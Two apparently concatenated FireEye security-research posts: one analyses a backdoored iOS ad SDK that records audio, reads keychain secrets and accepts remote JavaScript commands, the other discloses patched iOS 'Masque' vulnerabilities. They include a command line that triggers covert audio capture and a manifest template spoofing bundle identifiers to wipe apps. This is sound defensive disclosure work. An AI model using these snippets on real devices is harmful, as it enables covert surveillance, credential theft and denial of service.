Despite Apple’s reputation for keeping malware out of the App Store with its strict review process, this case demonstrates that it is still possible for dangerous code that exposes users to critical security and privacy risks to sneak into the App Store by piggybacking on unsuspecting apps. Backdoors that enable silently recording audio and uploading sensitive data when triggered by downloaded code clearly violate the requirements of the iOS Developer Program [3]. The requirements state that apps are not permitted to download code or scripts, with the exception of scripts that “do not change the primary purpose of the Application by providing features or functionality that are inconsistent with the intended and advertised purpose of the Application as submitted to the App Store.” And, for apps that can record audio, “a reasonably conspicuous audio, visual or other indicator must be displayed to the user as part of the Application to indicate that a Recording is taking place.”  The backdoored versions of mobiSage clearly violate these requirements, yet thousands of affected apps made it past the App Store review process.

Technical Details

As shown in Figure 1, the backdoored mobiSage library includes two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the backdoors and exposes interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.

 

Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then, we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format  adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.

 

 

Figure 2: Communication via URL loading in WebView.

To process a command in its queue, msageCore dispatches the command along with its parameters to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.

 

 

Figure 3: Command dispatch in msageCore.

High-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

msageCore Class Name

Interfaces

MSageCoreUIManagerPlugin

- captureAudio:

- captureImage:

- openMail:

- openSMS:

- openApp:

- openInAppStore:

- openCamera:

- openImagePicker:

- ...

MSageCoreLocation

- start:

- stop:

- setTimer:

- returnLocationInfo:webViewId:

- ...

MSageCorePluginFileModule

 

- createDir

- deleteDir:

- deleteFile:

- createFile:

- getFileContent:

- ...

MSageCoreKeyChain

- writeKeyValue:

- readValueByKey:

- resetValueByKey:

MSageCorePluginNetWork

- sendHttpGet:

- sendHttpPost:

- sendHttpUpload:

- ...

MSageCoreEncryptPlugin

- MD5Encrypt:

- SHA1Encrypt:

- AESEncrypt:

- AESDecrypt:

- DESEncrypt:

- DESDecrypt:

- XOREncrypt:

- XORDecrypt:

- RC4Encrypt:

- RC4Decrypt

- ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the backdoors in the library. They expose the ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.

 

Beyond the selected interfaces, the ad library exposes users to additional risks by including explicit logic to promote and install “enpublic” apps shown in Figure 4. As we have highlighted in previous blogs [4, 5, 6, 7, 8], enpublic apps can introduce additional security risks by using private APIs, which would normally cause an app to be blocked by the App Store review process. In previous blogs we have described a number of “Masque” attacks utilizing enpublic apps [5, 6, 7], which affect pre-iOS 9 devices. The attacks include background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations.

 

 

Figure 4: Installing “enpublic” apps to bypass Apple App Store review

 

We can observe the functionality of the ad library by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.

 

 

Figure 5: Capturing audio with duration and threshold.

 

Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.

 

 

Figure 6: Reading the keychain in the kSecClassGenericPassword class.

Remote control in msageJS

msageJS contains JavaScript code for communicating with a C2 server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.

 

 

Figure 7: The file layout of msageJS

 

The command execution interface is constructed as follows:

 

          adsage.exec(className, methodName, argsList, onSuccess, onFailure);

 

The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:

 

adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);

 

Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.

 

 

Figure 8: Base64 encoded JavaScript component in zip format.

 

When msageJS is launched, it sends a POST request to hxxp://entry.adsage.com/d/ to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9. Note that since the request uses HTTP rather than HTTPS, the response can be hijacked easily by a network attacker, who could replace the download URL with a link to malicious JavaScript code that triggers the backdoors.

 

Figure 9: Server response to msageJS update request via HTTP POST

Conclusion

In this blog, we described a high-risk ad library affecting thousands of iOS apps in the Apple App Store. We revealed the internals of backdoors which can be used to silently record audio, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these backdoors can be controlled remotely by JavaScript code fetched from the Internet in an insecure manner.

 

FireEye Protection

Immediately after we discovered the high-risk ad library and affected apps, FireEye updated detection rules in its NX and Mobile Threat Prevention (MTP) products to detect the affected apps and their network activities. In addition, FireEye customers can access the full list of affected apps upon request.

FireEye NX customers are alerted if an employee uses an infected app while their iOS device is connected to the corporate network. It is important to note that, even if the servers that the backdoored mobiSage SDK communicates with do not deliver JavaScript code that triggers the high-risk backdoors, the affected apps still try to connect to them using HTTP. This HTTP session is vulnerable to hijacking by outside attackers.

FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users receive on-device notifications of the detection and IT administrators receive email alerts.

Click here to learn more about FireEye Mobile Threat Protection product.

 

 

 

[1] http://www.adsage.com/mobisage

[2] http://www.adsage.cn/

[3] https://developer.apple.com/programs/ios/information/iOS_Program_Information_4_3_15.pdf [4] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html

[5] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html

[6] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html

[7] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

[8] https://www.virusbtn.com/virusbulletin/archive/2014/11/vb201411-Apple-without-shell

 

 

 

 

Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking

In the recent release of iOS 8.4, Apple fixed several vulnerabilities including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722/3725, and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque, which can be used to demolish apps, including system apps (e.g., Apple Watch, Health, Pay and so on), and to break the app data container. In this blog, we also disclose the details of a previously fixed, but undisclosed, masque vulnerability: Plugin Masque, which bypasses iOS entitlement enforcement and hijacks VPN traffic. Our investigation also shows that around one third of iOS devices still have not updated to versions 8.1.3 or above, even 5 months after the release of 8.1.3, and these devices are still vulnerable to all the Masque Attacks.

We have disclosed five kinds of Masque Attacks, as shown in the following table.

Name

Consequences disclosed till now

Mitigation status

App Masque

* Replace an existing app

* Harvest sensitive data

Fixed in iOS 8.1.3 [6]

URL Masque

* Bypass prompt of trust

* Hijack inter-app communication

Partially fixed in iOS 8.1.3 [11]

Manifest Masque

* Demolish other apps (incl. Apple Watch, Health, Pay, etc.) during over-the-air installations

Partially fixed in iOS 8.4

Plugin Masque

* Bypass prompt of trust

* Bypass VPN plugin entitlement

* Replace an existing VPN plugin

* Hijack device traffic

* Prevent device from rebooting

* Exploit more kernel vulnerabilities

Fixed in iOS 8.1.3

Extension Masque

* Access another app’s data

* Or prevent another app to access its own data

Partially fixed in iOS 8.4

Manifest Masque Attack leverages the CVE-2015-3722/3725 vulnerability to demolish an existing app on iOS when a victim installs an in-house iOS app wirelessly using enterprise provisioning from a website. The demolished app (the attack target) can be either a regular app downloaded from official App Store or even an important system app, such as Apple Watch, Apple Pay, App Store, Safari, Settings, etc. This vulnerability affects all iOS 7.x and iOS 8.x versions prior to iOS 8.4. We first notified Apple of this vulnerability in August 2014.

Extension Masque Attack can break the restrictions of app data container. A malicious app extension installed along with an in-house app on iOS 8 can either gain full access to a targeted app’s data container or prevent the targeted app from accessing its own data container. On June 14, security researchers Luyi, Xiaofeng et al. disclosed several severe issues on OS X, including a similar issue with this one [5]. They did remarkable research, but happened to miss this on iOS. Their report claimed: “this security risk is not present on iOS”. However, the data container issue does affect all iOS 8.x versions prior to iOS 8.4, and can be leveraged by an attacker to steal all data in a target app’s data container. We independently discovered this vulnerability on iOS and notified Apple before the report [5] was published, and Apple fixed this issue as part of CVE-2015-3725.

In addition to these two vulnerabilities patched on iOS 8.4, we also disclose the detail of another untrusted code injection attack by replacing the VPN Plugin, the Plugin Masque Attack. We reported this vulnerability to Apple in Nov 2014, and Apple fixed the vulnerability on iOS 8.1.3 when Apple patched the original Masque Attack (App Masque) [6, 11]. However, this exploit is even more severe than the original Masque Attack. The malicious code can be injected to the neagent process and can perform privileged operations, such as monitoring all VPN traffic, without the user’s awareness. We first demonstrated this attack in the Jailbreak Security Summit [7] in April 2015. Here we categorize this attack as Plugin Masque Attack.

We will discuss the technical details and demonstrate these three kinds of Masque Attacks.

Manifest Masque: Putting On the New, Taking Off the Old

To distribute an in-house iOS app with enterprise provisioning wirelessly, one has to publish a web page containing a hyperlink that redirects to a XML manifest file hosted on an https server [1]. The XML manifest file contains metadata of the in-house app, including its bundle identifier, bundle version and the download URL of the .ipa file, as shown in Table 1. When installing the in-house iOS app wirelessly, iOS downloads this manifest file first and parse the metadata for the installation process.

<a href="itms-services://?action=downloadmanifest&url=https://example.com/manifest. plist">Install App</a>

 

<plist>

      <array>

          <dict>

             ...

             <key>url</key>

             <string>https://XXXXX.com/another_browser.ipa</string>

            ...

             <key>bundle-identifier</key>

             <string>com.google.chrome.ios</string>

             …

             <key>bundle-version</key>

             <string>1000.0</string>

           </dict>

           <dict>

              … Entries For Another App

           </dict>

       <array>

</plist>

Table 1. An example of the hyperlink and the manifest file

According to Apple’s official document [1], the bundle-identifier field should be “Your app’s bundle identifier, exactly as specified in your Xcode project”. However, we have discovered that iOS doesn’t verify the consistency between the bundle identifier in the XML manifest file on the website and the bundle identifier within the app itself. If the XML manifest file on the website has a bundle identifier equivalent to that of another genuine app on the device, and the bundle-version in the manifest is higher than the genuine app’s version, the genuine app will be demolished down to a dummy placeholder, whereas the in-house app will still be installed using its built-in bundle id. The dummy placeholder will disappear after the victim restarts the device. Also, as shown in Table 1, a manifest file can contain different apps’ metadata entries to distribute multiple apps at a time, which means this vulnerability can cause multiple apps being demolished with just one click by the victim.

By leveraging this vulnerability, one app developer can install his/her own app and demolish other apps (e.g. a competitor’s app) at the same time. In this way, attackers can perform DoS attacks or phishing attacks on iOS.

Figure 1. Phishing Attack by installing “malicious Chrome” and demolishing the genuine one

Figure 1 shows an example of the phishing attack. When the user clicks a URL in the Gmail app, this URL is rewritten with the “googlechrome-x-callback://” scheme and supposed to be handled by Chrome on the device. However, an attacker can leverage the Manifest Masque vulnerability to demolish the genuine Chrome and install “malicious Chrome” registering the same scheme. Other than requiring the same bundle identifier to replace a genuine app in the original Masque Attack [xx], the malicious chrome in this phishing attack uses a different bundle identifier to bypass the installer’s bundle identifier validation. Later, when the victim clicks a URL in the Gmail app, the malicious Chrome can take over the rewritten URL scheme and perform more sophisticated attacks.

What’s worse, an attacker can also exploit this vulnerability to demolish all system apps (e.g. Apple Watch, Apple Pay UIService, App Store, Safari, Health, InCallService, Settings, etc.). Once demolished, these system apps will no longer be available to the victim, even if the victim restarts the device.

Here we demonstrate this DoS attack on iOS 8.3 to demolish all the system apps and one App Store app (i.e. Gmail) when the victim clicks only once to install an in-house app wirelessly. Note that after rebooting the device, all the system apps still remain demolished while the App Store app would disappear since it has already been uninstalled.